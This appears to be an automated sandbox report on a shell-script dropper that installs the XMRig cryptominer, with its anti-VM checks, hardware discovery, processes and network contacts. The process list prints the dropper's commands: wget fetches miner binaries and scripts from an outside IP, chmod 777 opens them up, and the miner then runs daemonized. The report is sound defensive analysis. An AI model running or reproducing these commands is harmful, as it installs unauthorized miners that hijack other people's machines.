Malware Analysis Report

2025-05-06 04:16

Sample ID 241024-ca78es1fqk
Target 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
SHA256 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb
Tags
xmrig antivm defense_evasion discovery miner
score
10/10

Analysis Overview

score
10/10

SHA256

8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb

Threat Level: Known bad

The file 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh was found to be: Known bad.

Malicious Activity Summary

xmrig antivm defense_evasion discovery miner

xmrig

XMRig Miner payload

File and Directory Permissions Modification

Executes dropped EXE

Reads hardware information

Checks hardware identifiers (DMI)

Enumerates running processes

Reads CPU attributes

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-24 01:53

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:53

Platform

debian9-mipsel-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:56

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/check.sh /tmp/check.sh N/A
N/A /tmp/xmrigDaemon /tmp/xmrigDaemon N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xmrigMiner N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/online /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_siblings /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map /tmp/xmrigMiner N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/cpumap /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xmrigMiner N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/bus/dax/devices /tmp/xmrigMiner N/A
File opened for reading /sys/devices/cpu_core/cpus /tmp/xmrigMiner N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/bus/soc/devices /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xmrigMiner N/A
File opened for reading /sys/devices/cpu_atom/cpus /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/online /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators /tmp/xmrigMiner N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/170/status /usr/bin/pgrep N/A
File opened for reading /proc/172/status /usr/bin/pgrep N/A
File opened for reading /proc/587/status /usr/bin/pgrep N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/179/status /usr/bin/pgrep N/A
File opened for reading /proc/183/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1150/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/sys/vm/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/10/status /usr/bin/pgrep N/A
File opened for reading /proc/23/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/1201/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/5/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/719/status /usr/bin/pgrep N/A
File opened for reading /proc/1191/status /usr/bin/pgrep N/A
File opened for reading /proc/sys/vm/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /proc/499/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/1031/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1286/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1365/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/974/status /usr/bin/pgrep N/A
File opened for reading /proc/1201/status /usr/bin/pgrep N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/1/status /usr/bin/pgrep N/A
File opened for reading /proc/770/status /usr/bin/pgrep N/A
File opened for reading /proc/961/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/545/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/171/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/173/status /usr/bin/pgrep N/A
File opened for reading /proc/1129/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/16/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1133/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1517/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1531/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/34/status /usr/bin/pgrep N/A
File opened for reading /proc/571/status /usr/bin/pgrep N/A
File opened for reading /proc/1232/cmdline /usr/bin/pgrep N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/check.sh /usr/bin/wget N/A
File opened for modification /tmp/xmrigMiner /usr/bin/wget N/A
File opened for modification /tmp/config.json /usr/bin/wget N/A
File opened for modification /tmp/xmrigDaemon /usr/bin/wget N/A
File opened for modification /tmp/config.json /tmp/xmrigMiner N/A

Processes

/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh

[/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh]

/usr/bin/wget

[wget http://45.202.35.107/xmrigDaemon]

/usr/bin/wget

[wget http://45.202.35.107/xmrigMiner]

/usr/bin/wget

[wget http://45.202.35.107/config.json]

/usr/bin/wget

[wget http://45.202.35.107/check.sh]

/bin/chmod

[chmod 777 xmrigMiner]

/bin/chmod

[chmod 777 xmrigDaemon]

/bin/chmod

[chmod 777 check.sh]

/tmp/check.sh

[./check.sh]

/usr/bin/pgrep

[pgrep -f xmrigDaemon]

/tmp/xmrigDaemon

[./xmrigDaemon]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

Network

Country Destination Domain Proto
UA 45.202.35.107:80 45.202.35.107 tcp
N/A 224.0.0.251:5353 udp
US 151.101.129.91:443 tcp
GB 185.125.188.62:443 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp
US 1.1.1.1:53 fi.salvium.herominers.com udp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp

Files

/tmp/xmrigDaemon

/tmp/xmrigMiner

/tmp/check.sh

/tmp/logggz.lgo


Analysis: behavioral2

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:53

Platform

debian9-armhf-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:53

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A